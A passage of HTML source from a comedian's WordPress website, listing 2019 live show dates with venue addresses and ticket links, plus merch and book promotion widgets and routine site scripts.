class="tribe-event-duration"> <span class="tribe-event-date-start">June 13 @ 7:30 pm</span> - <span class="tribe-event-time">9:00 pm</span> </div> </li> <li class="tribe-events-list-widget-events type-tribe_events post-3143 tribe-clearfix tribe-events-venue-3041"> <!-- Event Title --> <h4 class="tribe-event-title"> <a href="https://jimmydorecomedy.com/event/june-28th-portland-or-alberta-rose-theatre-730pm/" rel="bookmark">June 28th, Portland, OR &#8211; Alberta Rose Theatre &#8211; 7:30pm</a> </h4> <!-- Event Time --> <div class="tribe-event-duration"> <span class="tribe-event-date-start">June 28 @ 7:30 pm</span> - <span class="tribe-event-time">10:00 pm</span> </div> </li> <li class="tribe-events-list-widget-events type-tribe_events post-3145 tribe-clearfix tribe-events-venue-3041"> <!-- Event Title --> <h4 class="tribe-event-title"> <a href="https://jimmydorecomedy.com/event/june-29th-portland-or-alberta-rose-theatre-730pm/" rel="bookmark">June 29th, Portland, OR &#8211; Alberta Rose Theatre &#8211; 7:30pm</a> </h4> <!-- Event Time --> <div class="tribe-event-duration"> <span class="tribe-event-date-start">June 29 @ 7:30 pm</span> - <span class="tribe-event-time">10:00 pm</span> </div> </li> <li class="tribe-events-list-widget-events type-tribe_events post-3188 tribe-clearfix tribe-events-venue-2811"> <!-- Event Title --> <h4 class="tribe-event-title"> <a href="https://jimmydorecomedy.com/event/july-11th-burbank-ca-flappers-comedy-club-730pm/" rel="bookmark">July 11th, Burbank, CA &#8211; JAGOFF COMEDY Flappers Comedy Club &#8211; 7:30pm</a> </h4> <!-- Event Time --> <div class="tribe-event-duration"> <span class="tribe-event-date-start">July 11 @ 7:30 pm</span> - <span class="tribe-event-time">9:00 pm</span> </div> </li> <li class="tribe-events-list-widget-events type-tribe_events post-3147 tribe-clearfix tribe-events-venue-3150"> <!-- Event Title --> <h4 class="tribe-event-title"> <a href="https://jimmydorecomedy.com/event/july-13th-chicago-il-thalia-hall-7pm/" rel="bookmark">July 13th, Chicago, IL &#8211; Thalia Hall &#8211; 7pm</a> </h4> <!-- Event Time --> <div class="tribe-event-duration"> <span class="tribe-event-date-start">July 13 @ 7:00 pm</span> - <span class="tribe-event-time">10:00 pm</span> </div> </li> <li class="tribe-events-list-widget-events type-tribe_events post-3358 tribe-clearfix tribe-events-venue-3360"> <!-- Event Title --> <h4 class="tribe-event-title"> <a href="https://jimmydorecomedy.com/event/july-14th-chicago-il-jagoff-comedy-jimmy-dore-friends-zanies-comedy-club-730pm/" rel="bookmark">July 14th, Chicago, IL &#8211; JAGOFF COMEDY Jimmy Dore &#038; Friends, Zanies Comedy Club &#8211; 7:30pm</a> </h4> <!-- Event Time --> <div class="tribe-event-duration"> <span class="tribe-event-date-start">July 14 @ 7:30 pm</span> - <span class="tribe-event-time">9:30 pm</span> </div> </li> <li class="tribe-events-list-widget-events type-tribe_events post-3121 tribe-clearfix tribe-events-venue-2811"> <!-- Event Title --> <h4 class="tribe-event-title"> <a href="https://jimmydorecomedy.com/event/august-2nd-burbank-ca-flappers-comedy-club-730pm/" rel="bookmark">August 2nd, Burbank, CA &#8211; Flappers Comedy Club 7:30pm</a> </h4> <!-- Event Time --> <div class="tribe-event-duration"> <span class="tribe-event-date-start">August 2 @ 7:30 pm</span> - <span class="tribe-event-time">9:30 pm</span> </div> </li> </ol><!-- .tribe-list-widget --> <p class="tribe-events-widget-link"> <a href="https://jimmydorecomedy.com/events/" rel="bookmark">View All Events</a> </p> </aside><script type="application/ld+json"> [{"@context":"http://schema.org","@type":"Event","name":"May 18th, Austin, TX &#8211; Stateside At The Paramount &#8211; 8pm","description":"&lt;p&gt;&lt;a class=&quot;no-decoration purchase-tickets&quot; href=&quot;https://tickets.austintheatre.org/single/EventDetail.aspx?p=4550&quot;&gt;&lt;br /&gt;\\nPurchase Tickets&lt;br /&gt;\\n&lt;/a&gt;&lt;/p&gt;\\n","url":"https://jimmydorecomedy.com/event/may-18th-austin-tx-stateside-at-the-paramount-8pm/","startDate":"2019-05-18T20:00:00-07:00","endDate":"2019-05-18T22:00:00-07:00","location":{"@type":"Place","name":"Stateside at the Paramount","description":"","url":false,"address":{"@type":"PostalAddress","streetAddress":"719 Congress Ave","addressLocality":"Austin","addressRegion":"TX","postalCode":"78701","addressCountry":"United States"},"telephone":"","sameAs":""}},{"@context":"http://schema.org","@type":"Event","name":"May 19th, Austin, TX &#8211; JAGOFF COMEDY Jimmy Dore &#038; Friends, The Velveeta Room &#8211; 7pm","description":"&lt;p&gt;&lt;a class=&quot;no-decoration purchase-tickets&quot; href=&quot;https://the-velveeta-room-the-velveeta-room.seatengine.com/shows/101358&quot;&gt;&lt;br /&gt;\\nPurchase Tickets&lt;br /&gt;\\n&lt;/a&gt;&lt;/p&gt;\\n","url":"https://jimmydorecomedy.com/event/may-19th-austin-tx-jagoff-comedy-jimmy-dore-friends-the-velveeta-room-7pm-2/","startDate":"2019-05-19T19:00:00-07:00","endDate":"2019-05-19T21:00:00-07:00","location":{"@type":"Place","name":"The Velveeta Room","description":"","url":false,"address":{"@type":"PostalAddress","streetAddress":"521 E 6th St","addressLocality":"Austin","addressRegion":"TX","addressCountry":"United States"},"telephone":"","sameAs":""}},{"@context":"http://schema.org","@type":"Event","name":"June 5th, Hermosa Beach, CA &#8211; Comedy And Magic Club &#8211; 7pm","description":"&lt;p&gt;&lt;a class=&quot;no-decoration purchase-tickets&quot; href=&quot;http://comedyandmagicclub.com/event.cfm?id=525805&amp;cart&quot;&gt;&lt;br /&gt;\\nPurchase Tickets&lt;br /&gt;\\n&lt;/a&gt;&lt;/p&gt;\\n","url":"https://jimmydorecomedy.com/event/june-5th-hermosa-beach-ca-comedy-and-magic-club-7pm/","startDate":"2019-06-05T19:00:00-07:00","endDate":"2019-06-05T21:30:00-07:00","location":{"@type":"Place","name":"Comedy And MAgic Club","description":"","url":false,"address":{"@type":"PostalAddress","streetAddress":"1018 Hermosa Ave.","addressLocality":"Hermosa Beach","addressRegion":"CA","postalCode":"90254","addressCountry":"United States"},"telephone":"","sameAs":"http://comedyandmagicclub.com/"}},{"@context":"http://schema.org","@type":"Event","name":"June 13th, Burbank, CA &#8211; JAGOFF COMEDY Flappers Comedy Club &#8211; 7:30pm","description":"&lt;p&gt;&lt;a class=&quot;no-decoration purchase-tickets&quot; href=&quot;http://www.flapperscomedy.com/shows/jagoff-comedy-with-jimmy-dore-friends/56456/&quot;&gt;&lt;br /&gt;\\nPurchase Tickets&lt;br /&gt;\\n&lt;/a&gt;&lt;/p&gt;\\n","url":"https://jimmydorecomedy.com/event/june-13th-burbank-ca-flappers-comedy-club-730pm/","startDate":"2019-06-13T19:30:00-07:00","endDate":"2019-06-13T21:00:00-07:00","location":{"@type":"Place","name":"Flappers Comedy Club","description":"","url":false,"address":{"@type":"PostalAddress","streetAddress":"102 East Magnolia","addressLocality":"Burbank","addressRegion":"CA","postalCode":"91502","addressCountry":"United States"},"telephone":"","sameAs":""}},{"@context":"http://schema.org","@type":"Event","name":"June 28th, Portland, OR &#8211; Alberta Rose Theatre &#8211; 7:30pm","description":"&lt;p&gt;&lt;a class=&quot;no-decoration purchase-tickets&quot; href=&quot;https://www.albertarosetheatre.com/tickets.html?Page=https://secure-public.ticketbiscuit.com/AlbertaRoseTheatre/Events/357282&quot;&gt;&lt;br /&gt;\\nPurchase Tickets&lt;br /&gt;\\n&lt;/a&gt;&lt;/p&gt;\\n","url":"https://jimmydorecomedy.com/event/june-28th-portland-or-alberta-rose-theatre-730pm/","startDate":"2019-06-28T19:30:00+00:00","endDate":"2019-06-28T22:00:00+00:00","location":{"@type":"Place","name":"Alberta Rose Theater","description":"","url":false,"address":{"@type":"PostalAddress","streetAddress":"3000 NE Alberta S","addressLocality":"Portland","addressRegion":"OR","postalCode":"97211","addressCountry":"United States"},"telephone":"(503) 719-6055","sameAs":"http://albertarosetheatre.com/"}},{"@context":"http://schema.org","@type":"Event","name":"June 29th, Portland, OR &#8211; Alberta Rose Theatre &#8211; 7:30pm","description":"&lt;p&gt;&lt;a class=&quot;no-decoration purchase-tickets&quot; href=&quot;https://www.albertarosetheatre.com/tickets.html?Page=https://secure-public.ticketbiscuit.com/AlbertaRoseTheatre/Events/357283&quot;&gt;&lt;br /&gt;\\nPurchase Tickets&lt;br /&gt;\\n&lt;/a&gt;&lt;/p&gt;\\n","url":"https://jimmydorecomedy.com/event/june-29th-portland-or-alberta-rose-theatre-730pm/","startDate":"2019-06-29T19:30:00+00:00","endDate":"2019-06-29T22:00:00+00:00","location":{"@type":"Place","name":"Alberta Rose Theater","description":"","url":false,"address":{"@type":"PostalAddress","streetAddress":"3000 NE Alberta S","addressLocality":"Portland","addressRegion":"OR","postalCode":"97211","addressCountry":"United States"},"telephone":"(503) 719-6055","sameAs":"http://albertarosetheatre.com/"}},{"@context":"http://schema.org","@type":"Event","name":"July 11th, Burbank, CA &#8211; JAGOFF COMEDY Flappers Comedy Club &#8211; 7:30pm","description":"&lt;p&gt;&lt;a class=&quot;no-decoration purchase-tickets&quot; href=&quot;http://www.flapperscomedy.com/shows/jagoff-comedy-with-jimmy-dore-friends/56457/&quot;&gt;&lt;br /&gt;\\nPurchase Tickets&lt;br /&gt;\\n&lt;/a&gt;&lt;/p&gt;\\n","url":"https://jimmydorecomedy.com/event/july-11th-burbank-ca-flappers-comedy-club-730pm/","startDate":"2019-07-11T19:30:00-07:00","endDate":"2019-07-11T21:00:00-07:00","location":{"@type":"Place","name":"Flappers Comedy Club","description":"","url":false,"address":{"@type":"PostalAddress","streetAddress":"102 East Magnolia","addressLocality":"Burbank","addressRegion":"CA","postalCode":"91502","addressCountry":"United States"},"telephone":"","sameAs":""}},{"@context":"http://schema.org","@type":"Event","name":"July 13th, Chicago, IL &#8211; Thalia Hall &#8211; 7pm","description":"&lt;p&gt;&lt;a class=&quot;no-decoration purchase-tickets&quot; href=&quot;https://bit.ly/2HavouK&quot;&gt;&lt;br /&gt;\\nPurchase Tickets&lt;br /&gt;\\n&lt;/a&gt;&lt;/p&gt;\\n","url":"https://jimmydorecomedy.com/event/july-13th-chicago-il-thalia-hall-7pm/","startDate":"2019-07-13T19:00:00-07:00","endDate":"2019-07-13T22:00:00-07:00","location":{"@type":"Place","name":"Thalia Hall","description":"","url":false,"address":{"@type":"PostalAddress","streetAddress":"1807 South Allport Street","addressLocality":"Chicago","addressRegion":"IL","postalCode":"60608","addressCountry":"United States"},"telephone":"","sameAs":""}},{"@context":"http://schema.org","@type":"Event","name":"July 14th, Chicago, IL &#8211; JAGOFF COMEDY Jimmy Dore &#038; Friends, Zanies Comedy Club &#8211; 7:30pm","description":"&lt;p&gt;&lt;a class=&quot;no-decoration purchase-tickets&quot; href=&quot;https://zanieschicago.laughstub.com/event.cfm?cart&amp;id=528109&quot;&gt;&lt;br /&gt;\\nPurchase Tickets&lt;br /&gt;\\n&lt;/a&gt;&lt;/p&gt;\\n","url":"https://jimmydorecomedy.com/event/july-14th-chicago-il-jagoff-comedy-jimmy-dore-friends-zanies-comedy-club-730pm/","startDate":"2019-07-14T19:30:00-07:00","endDate":"2019-07-14T21:30:00-07:00","location":{"@type":"Place","name":"Zanies Comedy Club","description":"","url":false,"address":{"@type":"PostalAddress","streetAddress":"1548 North Wells Street","addressLocality":"Chicago","addressRegion":"IL","addressCountry":"United States"},"telephone":"","sameAs":""}},{"@context":"http://schema.org","@type":"Event","name":"August 2nd, Burbank, CA &#8211; Flappers Comedy Club 7:30pm","description":"&lt;p&gt;&lt;a class=&quot;no-decoration purchase-tickets&quot; href=&quot;https://bit.ly/2OfBTKQ&quot;&gt;&lt;br /&gt;\\nPurchase Tickets&lt;br /&gt;\\n&lt;/a&gt;&lt;/p&gt;\\n","url":"https://jimmydorecomedy.com/event/august-2nd-burbank-ca-flappers-comedy-club-730pm/","startDate":"2019-08-02T19:30:00+00:00","endDate":"2019-08-02T21:30:00+00:00","location":{"@type":"Place","name":"Flappers Comedy Club","description":"","url":false,"address":{"@type":"PostalAddress","streetAddress":"102 East Magnolia","addressLocality":"Burbank","addressRegion":"CA","postalCode":"91502","addressCountry":"United States"},"telephone":"","sameAs":""}}] </script><aside id="tribe-events-list-widget-3" class="widget tribe-events-list-widget"><h3 class="widget-title"><span>Upcoming Live Shows</span></h3> <ol class="tribe-list-widget"> <li class="tribe-events-list-widget-events type-tribe_events post-3158 tribe-clearfix tribe-events-venue-3160"> <!-- Event Title --> <h4 class="tribe-event-title"> <a href="https://jimmydorecomedy.com/event/may-18th-austin-tx-stateside-at-the-paramount-8pm/" rel="bookmark">May 18th, Austin, TX &#8211; Stateside At The Paramount &#8211; 8pm</a> </h4> <!-- Event Time --> <div class="tribe-event-duration"> <span class="tribe-event-date-start">May 18 @ 8:00 pm</span> - <span class="tribe-event-time">10:00 pm</span> </div> </li> <li class="tribe-events-list-widget-events type-tribe_events post-3354 tribe-clearfix tribe-events-venue-3351"> <!-- Event Title --> <h4 class="tribe-event-title"> <a href="https://jimmydorecomedy.com/event/may-19th-austin-tx-jagoff-comedy-jimmy-dore-friends-the-velveeta-room-7pm-2/" rel="bookmark">May 19th, Austin, TX &#8211; JAGOFF COMEDY Jimmy Dore &#038; Friends, The Velveeta Room &#8211; 7pm</a> </h4> <!-- Event Time --> <div class="tribe-event-duration"> <span class="tribe-event-date-start">May 19 @ 7:00 pm</span> - <span class="tribe-event-time">9:00 pm</span> </div> </li> <li class="tribe-events-list-widget-events type-tribe_events post-3207 tribe-clearfix tribe-events-venue-3210"> <!-- Event Title --> <h4 class="tribe-event-title"> <a href="https://jimmydorecomedy.com/event/june-5th-hermosa-beach-ca-comedy-and-magic-club-7pm/" rel="bookmark">June 5th, Hermosa Beach, CA &#8211; Comedy And Magic Club &#8211; 7pm</a> </h4> <!-- Event Time --> <div class="tribe-event-duration"> <span class="tribe-event-date-start">June 5 @ 7:00 pm</span> - <span class="tribe-event-time">9:30 pm</span> </div> </li> </ol><!-- .tribe-list-widget --> <p class="tribe-events-widget-link"> <a href="https://jimmydorecomedy.com/events/" rel="bookmark">View All Events</a> </p> </aside><script type="application/ld+json"> [{"@context":"http://schema.org","@type":"Event","name":"May 18th, Austin, TX &#8211; Stateside At The Paramount &#8211; 8pm","description":"&lt;p&gt;&lt;a class=&quot;no-decoration purchase-tickets&quot; href=&quot;https://tickets.austintheatre.org/single/EventDetail.aspx?p=4550&quot;&gt;&lt;br /&gt;\\nPurchase Tickets&lt;br /&gt;\\n&lt;/a&gt;&lt;/p&gt;\\n","url":"https://jimmydorecomedy.com/event/may-18th-austin-tx-stateside-at-the-paramount-8pm/","startDate":"2019-05-18T20:00:00-07:00","endDate":"2019-05-18T22:00:00-07:00","location":{"@type":"Place","name":"Stateside at the Paramount","description":"","url":false,"address":{"@type":"PostalAddress","streetAddress":"719 Congress Ave","addressLocality":"Austin","addressRegion":"TX","postalCode":"78701","addressCountry":"United States"},"telephone":"","sameAs":""}},{"@context":"http://schema.org","@type":"Event","name":"May 19th, Austin, TX &#8211; JAGOFF COMEDY Jimmy Dore &#038; Friends, The Velveeta Room &#8211; 7pm","description":"&lt;p&gt;&lt;a class=&quot;no-decoration purchase-tickets&quot; href=&quot;https://the-velveeta-room-the-velveeta-room.seatengine.com/shows/101358&quot;&gt;&lt;br /&gt;\\nPurchase Tickets&lt;br /&gt;\\n&lt;/a&gt;&lt;/p&gt;\\n","url":"https://jimmydorecomedy.com/event/may-19th-austin-tx-jagoff-comedy-jimmy-dore-friends-the-velveeta-room-7pm-2/","startDate":"2019-05-19T19:00:00-07:00","endDate":"2019-05-19T21:00:00-07:00","location":{"@type":"Place","name":"The Velveeta Room","description":"","url":false,"address":{"@type":"PostalAddress","streetAddress":"521 E 6th St","addressLocality":"Austin","addressRegion":"TX","addressCountry":"United States"},"telephone":"","sameAs":""}},{"@context":"http://schema.org","@type":"Event","name":"June 5th, Hermosa Beach, CA &#8211; Comedy And Magic Club &#8211; 7pm","description":"&lt;p&gt;&lt;a class=&quot;no-decoration purchase-tickets&quot; href=&quot;http://comedyandmagicclub.com/event.cfm?id=525805&amp;cart&quot;&gt;&lt;br /&gt;\\nPurchase Tickets&lt;br /&gt;\\n&lt;/a&gt;&lt;/p&gt;\\n","url":"https://jimmydorecomedy.com/event/june-5th-hermosa-beach-ca-comedy-and-magic-club-7pm/","startDate":"2019-06-05T19:00:00-07:00","endDate":"2019-06-05T21:30:00-07:00","location":{"@type":"Place","name":"Comedy And MAgic Club","description":"","url":false,"address":{"@type":"PostalAddress","streetAddress":"1018 Hermosa Ave.","addressLocality":"Hermosa Beach","addressRegion":"CA","postalCode":"90254","addressCountry":"United States"},"telephone":"","sameAs":"http://comedyandmagicclub.com/"}}] </script> </div> </div><!-- .inner-wrap --> </div><!-- #main --> <footer id="colophon" class="clearfix"> <div class="footer-widgets-wrapper"> <div class="inner-wrap"> <div class="footer-widgets-area clearfix"> <div class="tg-one-third"> <aside id="media_image-3" class="widget widget_media_image"><h3 class="widget-title"><span>Read Jimmy&#8217;s Book</span></h3><a href="https://jimmydorecomedy.com/read-jimmys-book/" target="_blank"><img width="665" height="665" src="//jimmydorecomedy.com/wp-content/plugins/a3-lazy-load/assets/images/lazy_placeholder.gif" data-lazy-type="image" data-src="https://upisnvej69-flywheel.netdna-ssl.com/wp-content/uploads/2016/12/square-your-country.png" class="lazy lazy-hidden image wp-image-1714 alignnone attachment-full size-full" alt="" style="max-width: 100%; height: auto;" srcset="" data-srcset="https://upisnvej69-flywheel.netdna-ssl.com/wp-content/uploads/2016/12/square-your-country.png 665w, https://upisnvej69-flywheel.netdna-ssl.com/wp-content/uploads/2016/12/square-your-country-150x150.png 150w, https://upisnvej69-flywheel.netdna-ssl.com/wp-content/uploads/2016/12/square-your-country-300x300.png 300w, https://upisnvej69-flywheel.netdna-ssl.com/wp-content/uploads/2016/12/square-your-country-230x230.png 230w, https://upisnvej69-flywheel.netdna-ssl.com/wp-content/uploads/2016/12/square-your-country-365x365.png 365w" sizes="(max-width: 665px) 100vw, 665px" /><noscript><img width="665" height="665" src="https://upisnvej69-flywheel.netdna-ssl.com/wp-content/uploads/2016/12/square-your-country.png" class="image wp-image-1714 alignnone attachment-full size-full" alt="" style="max-width: 100%; height: auto;" srcset="https://upisnvej69-flywheel.netdna-ssl.com/wp-content/uploads/2016/12/square-your-country.png 665w, https://upisnvej69-flywheel.netdna-ssl.com/wp-content/uploads/2016/12/square-your-country-150x150.png 150w, https://upisnvej69-flywheel.netdna-ssl.com/wp-content/uploads/2016/12/square-your-country-300x300.png 300w, https://upisnvej69-flywheel.netdna-ssl.com/wp-content/uploads/2016/12/square-your-country-230x230.png 230w, https://upisnvej69-flywheel.netdna-ssl.com/wp-content/uploads/2016/12/square-your-country-365x365.png 365w" sizes="(max-width: 665px) 100vw, 665px" /></noscript></a></aside> </div> <div class="tg-one-third"> <aside id="media_image-6" class="widget widget_media_image"><h3 class="widget-title"><span>Check out our Merch Store</span></h3><a href="https://bit.ly/tjdsmerch"><img width="300" height="300" src="//jimmydorecomedy.com/wp-content/plugins/a3-lazy-load/assets/images/lazy_placeholder.gif" data-lazy-type="image" data-src="https://upisnvej69-flywheel.netdna-ssl.com/wp-content/uploads/2019/01/jagoff_mug-300x300.jpg" class="lazy lazy-hidden image wp-image-3152 attachment-medium size-medium" alt="" style="max-width: 100%; height: auto;" srcset="" data-srcset="https://upisnvej69-flywheel.netdna-ssl.com/wp-content/uploads/2019/01/jagoff_mug-300x300.jpg 300w, https://upisnvej69-flywheel.netdna-ssl.com/wp-content/uploads/2019/01/jagoff_mug-150x150.jpg 150w, https://upisnvej69-flywheel.netdna-ssl.com/wp-content/uploads/2019/01/jagoff_mug-768x768.jpg 768w, https://upisnvej69-flywheel.netdna-ssl.com/wp-content/uploads/2019/01/jagoff_mug-230x230.jpg 230w, https://upisnvej69-flywheel.netdna-ssl.com/wp-content/uploads/2019/01/jagoff_mug-365x365.jpg 365w, https://upisnvej69-flywheel.netdna-ssl.com/wp-content/uploads/2019/01/jagoff_mug.jpg 1000w" sizes="(max-width: 300px) 100vw, 300px" /><noscript><img width="300" height="300" src="https://upisnvej69-flywheel.netdna-ssl.com/wp-content/uploads/2019/01/jagoff_mug-300x300.jpg" class="image wp-image-3152 attachment-medium size-medium" alt="" style="max-width: 100%; height: auto;" srcset="https://upisnvej69-flywheel.netdna-ssl.com/wp-content/uploads/2019/01/jagoff_mug-300x300.jpg 300w, https://upisnvej69-flywheel.netdna-ssl.com/wp-content/uploads/2019/01/jagoff_mug-150x150.jpg 150w, https://upisnvej69-flywheel.netdna-ssl.com/wp-content/uploads/2019/01/jagoff_mug-768x768.jpg 768w, https://upisnvej69-flywheel.netdna-ssl.com/wp-content/uploads/2019/01/jagoff_mug-230x230.jpg 230w, https://upisnvej69-flywheel.netdna-ssl.com/wp-content/uploads/2019/01/jagoff_mug-365x365.jpg 365w, https://upisnvej69-flywheel.netdna-ssl.com/wp-content/uploads/2019/01/jagoff_mug.jpg 1000w" sizes="(max-width: 300px) 100vw, 300px" /></noscript></a></aside> </div> <div class="tg-one-third tg-one-third-last"> <aside id="media_image-7" class="widget widget_media_image"><h3 class="widget-title"><span>Check out our Merch Store</span></h3><a href="https://bit.ly/shopTJDS"><img width="300" height="300" src="//jimmydorecomedy.com/wp-content/plugins/a3-lazy-load/assets/images/lazy_placeholder.gif" data-lazy-type="image" data-src="https://upisnvej69-flywheel.netdna-ssl.com/wp-content/uploads/2019/01/megaphone_black_tee-300x300.jpg" class="lazy lazy-hidden image wp-image-3151 attachment-medium size-medium" alt="" style="max-width: 100%; height: auto;" srcset="" data-srcset="https://upisnvej69-flywheel.netdna-ssl.com/wp-content/uploads/2019/01/megaphone_black_tee-300x300.jpg 300w, https://upisnvej69-flywheel.netdna-ssl.com/wp-content/uploads/2019/01/megaphone_black_tee-150x150.jpg 150w, https://upisnvej69-flywheel.netdna-ssl.com/wp-content/uploads/2019/01/megaphone_black_tee-768x768.jpg 768w, https://upisnvej69-flywheel.netdna-ssl.com/wp-content/uploads/2019/01/megaphone_black_tee-230x230.jpg 230w, https://upisnvej69-flywheel.netdna-ssl.com/wp-content/uploads/2019/01/megaphone_black_tee-365x365.jpg 365w, https://upisnvej69-flywheel.netdna-ssl.com/wp-content/uploads/2019/01/megaphone_black_tee.jpg 1000w" sizes="(max-width: 300px) 100vw, 300px" /><noscript><img width="300" height="300" src="https://upisnvej69-flywheel.netdna-ssl.com/wp-content/uploads/2019/01/megaphone_black_tee-300x300.jpg" class="image wp-image-3151 attachment-medium size-medium" alt="" style="max-width: 100%; height: auto;" srcset="https://upisnvej69-flywheel.netdna-ssl.com/wp-content/uploads/2019/01/megaphone_black_tee-300x300.jpg 300w, https://upisnvej69-flywheel.netdna-ssl.com/wp-content/uploads/2019/01/megaphone_black_tee-150x150.jpg 150w, https://upisnvej69-flywheel.netdna-ssl.com/wp-content/uploads/2019/01/megaphone_black_tee-768x768.jpg 768w, https://upisnvej69-flywheel.netdna-ssl.com/wp-content/uploads/2019/01/megaphone_black_tee-230x230.jpg 230w, https://upisnvej69-flywheel.netdna-ssl.com/wp-content/uploads/2019/01/megaphone_black_tee-365x365.jpg 365w, https://upisnvej69-flywheel.netdna-ssl.com/wp-content/uploads/2019/01/megaphone_black_tee.jpg 1000w" sizes="(max-width: 300px) 100vw, 300px" /></noscript></a></aside> </div> </div> </div> </div> <div class="footer-socket-wrapper clearfix"> <div class="inner-wrap"> <div class="footer-socket-area"> <nav class="footer-menu" class="clearfix"> </nav> </div> </div> </div> </footer> <a href="#masthead" id="scroll-up"><i class="fa fa-long-arrow-up"></i></a> </div><!-- #page --> <!-- Memberships powered by Paid Memberships Pro v2.0.4. --> <script> ( function ( body ) { 'use strict'; body.className = body.className.replace( /\btribe-no-js\b/, 'tribe-js' ); } )( document.body ); </script> <script type="text/javascript"> /* <![CDATA[ */ var jimmySlides = jQuery('.slides figure'); jQuery(jimmySlides[0]).attr("onclick","window.open('https://jimmydorecomedy.com/read-jimmys-book/')"); jQuery(jimmySlides[1]).attr("onclick","window.open('https://www.amazon.com/Jimmy-Dore-Sentenced-Live/dp/B01HP3VZ6W')"); jQuery(jimmySlides[2]).attr("onclick","window.open('https://www.amazon.com/gp/product/B0017VG5XW')"); jQuery(jimmySlides[3]).attr("onclick","window.open('https://shop.spreadshirt.com/TJDS')"); /* var iContentYT_focus; jQuery('iframe')[0].contentWindow.focus(function() { iContentYT_focus = true; }); jQuery('iframe')[0].contentWindow.blur(function() { iContentYT_focus = false; }); var window_focus; jQuery(window).focus(function() { window_focus = true; }).blur(function() { window_focus = false; }); function checkFocus() { if(document.activeElement == document.getElementsByTagName("iframe")[0] || window_focus) { console.log('jimmy site has focus'); } else { console.log('jimmy site not focused'); pauseJimmyVideo(); } } //window.setInterval(checkFocus, 1000); */ var pauseJimmyVideo = function() { //var jimmyVid = document.getElementById("_ytid_69804"); var jimmyVid = document.getElementsByTagName("iframe")[0]; jimmyVid.contentWindow.postMessage('{"event":"command","func":"pauseVideo","args":""}', '*'); } //////////// Added by Richard Chen below... // Makes Upcoming Live Shows widget title into a link jQuery('#tribe-events-list-widget-3 .widget-title').click(function(){ window.location.href='https://jimmydorecomedy.com/events/list/'; }); jQuery('#tribe-events-list-widget-3 .widget-title').hover(function(){ jQuery(this).css('cursor','pointer'); }); /* ]]> */ </script> <script> /* <![CDATA[ */var tribe_l10n_datatables = {"aria":{"sort_ascending":": activate to sort column ascending","sort_descending":": activate to sort column descending"},"length_menu":"Show _MENU_ entries","empty_table":"No data available in table","info":"Showing _START_ to _END_ of _TOTAL_ entries","info_empty":"Showing 0 to 0 of 0 entries","info_filtered":"(filtered from _MAX_ total entries)","zero_records":"No matching records found","search":"Search:","all_selected_text":"All items on this page were selected. ","select_all_link":"Select all pages","clear_selection":"Clear Selection.","pagination":{"all":"All","next":"Next","previous":"Previous"},"select":{"rows":{"0":"","_":": Selected %d rows","1":": Selected 1 row"}},"datepicker":{"dayNames":["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],"dayNamesShort":["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],"dayNamesMin":["S","M","T","W","T","F","S"],"monthNames":["January","February","March","April","May","June","July","August","September","October","November","December"],"monthNamesShort":["January","February","March","April","May","June","July","August","September","October","November","December"],"monthNamesMin":["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec"],"nextText":"Next","prevText":"Prev","currentText":"Today","closeText":"Done","today":"Today","clear":"Clear"}};var tribe_system_info = {"sysinfo_optin_nonce":"0b2aab80e2","clipboard_btn_text":"Copy to clipboard","clipboard_copied_text":"System info copied","clipboard_fail_text":"Press \"Cmd + C\" to copy"};/* ]]> */ </script><link rel='stylesheet' id='tribe-events-custom-jquery-styles-css' href='https://upisnvej69-flywheel.netdna-ssl.com/wp-content/plugins/the-events-calendar/vendor/jquery/smoothness/jquery-ui-1.8.23.custom.css?ver=4.9.0' type='text/css' media='all' /> <link rel='stylesheet' id='tribe-events-bootstrap-datepicker-css-css' href='https://upisnvej69-flywheel.netdna-ssl.com/wp-content/plugins/the-events-calendar/vendor/bootstrap-datepicker/css/bootstrap-datepicker.standalone.min.css?ver=4.9.0' type='text/css' media='all' /> <link rel='stylesheet' id='tribe-events-calendar-style-css' href='https://upisnvej69-flywheel.netdna-ssl.com/wp-content/plugins/the-events-calendar/src/resources/css/tribe-events-theme.min.css?ver=4.9.0' type='text/css' media='all' /> <script type='text/javascript' src='https://upisnvej69-flywheel.netdna-ssl.com/wp-content/themes/accelerate/js/jquery.cycle.all.min.js?ver=3.0.3'></script> <script type='text/javascript' src='https://upisnvej69-flywheel.netdna-ssl.com/wp-content/themes/accelerate/js/accelerate-slider-setting.js?ver=5.1.1'></script> <script type='text/javascript' src='https://upisnvej69-flywheel.netdna-ssl.com/wp-content/themes/accelerate/js/navigation.js?ver=5.1.1'></script> <script type='text/javascript'> /* <![CDATA[ */ var a3_lazyload_params = {"apply_images":"1","apply_videos":"1"}; /* ]]> */ </script> <script type='text/javascript' src='//jimmydorecomedy.com/wp-content/plugins/a3-lazy-load/assets/js/jquery.lazyloadxt.extra.min.js?ver=1.9.2'></script> <script type='text/javascript' src='//jimmydorecomedy.com/wp-content/plugins/a3-lazy-load/assets/js/jquery.lazyloadxt.srcset.min.js?ver=1.9.2'></script> <script type='text/javascript'> /* <![CDATA[ */ var a3_lazyload_extend_params = {"edgeY":"0"}; /* ]]> */ </script> <script type='text/javascript' src='//jimmydorecomedy.com/wp-content/plugins/a3-lazy-load/assets/js/jquery.lazyloadxt.extend.js?ver=1.9.2'></script> <script type='text/javascript' src='https://upisnvej69-flywheel.netdna-ssl.com/wp-content/plugins/youtube-embed-plus-pro/scripts/fitvids.min.js?ver=13.1'></script> <script type='text/javascript' src='https://upisnvej69-flywheel.netdna-ssl.com/wp-includes/js/wp-embed.min.js?ver=5.1.1'></script> </body> </html>
0
